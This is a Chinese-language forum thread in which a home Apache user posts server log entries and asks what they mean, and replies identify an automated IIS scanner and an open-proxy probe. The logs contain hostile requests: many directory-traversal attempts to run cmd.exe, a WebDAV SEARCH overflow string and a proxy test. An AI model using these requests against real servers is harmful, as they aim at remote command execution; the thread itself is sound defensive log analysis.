大牛看看, 别人在我的apache上搞了什么

CBD5C0CFCAA6

我家里的机器,winxp+apache2.0.52
给朋友作个主页
今天看日志,发现几个下面这些内容
1,
221.221.17.2 - - [23/May/2005:13:52:27 +0800] "SEARCH /
\x90\x02\xb1......(许多\x02\xb1)
\x90.....(许多\x90)" 414 336

2,

221.221.17.153 - - [27/May/2005:22:55:38 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
221.221.17.153 - - [27/May/2005:22:55:41 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
221.221.17.153 - - [27/May/2005:22:55:42 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
221.221.17.153 - - [27/May/2005:22:55:43 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
221.221.17.153 - - [27/May/2005:22:55:44 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314

3,

221.221.19.211 - - [27/May/2005:23:40:36 +0800] "OPTIONS / HTTP/1.1" 200 2509

CBD5C0CFCAA6

再加一个:
211.146.112.211 - - [29/May/2005:00:26:40 +0800] "GET http://proxy-scanner.thu.cn/proxy-scanner.php HTTP/1.1" 404 310

goodloveboys

脚本扫描

CBD5C0CFCAA6

goodloveboys兄, 是第一还是第二个?
他能不能得到服务器上面的脚本?(咱是用瘟到死, 最怕这个)

L0ading

针对IIS的扫描器  表害怕

goodloveboys

原帖由 "CBD5C0CFCAA6" 发表：
goodloveboys兄, 是第一还是第二个?
他能不能得到服务器上面的脚本?(咱是用瘟到死, 最怕这个)

从你帖的看,没有得到进一步的信息

Osment

这段脚本只是针对 IIS 有效的。呵呵。你是apache就不要管了。

PS:这样无聊的家伙太多了。整天去扫描别人的网站。汗。。

abel

[quote]原帖由 "CBD5C0CFCAA6"]005:00:26:40 +0800] "GET http://proxy-scanner.thu.cn/proxy-scanner.php HTTP/1.1" 404 310[/quote 发表：

這個訊息你要多注意
主要要測試你的 web server 有沒有支援 proxy ,
及 open proxy 狀況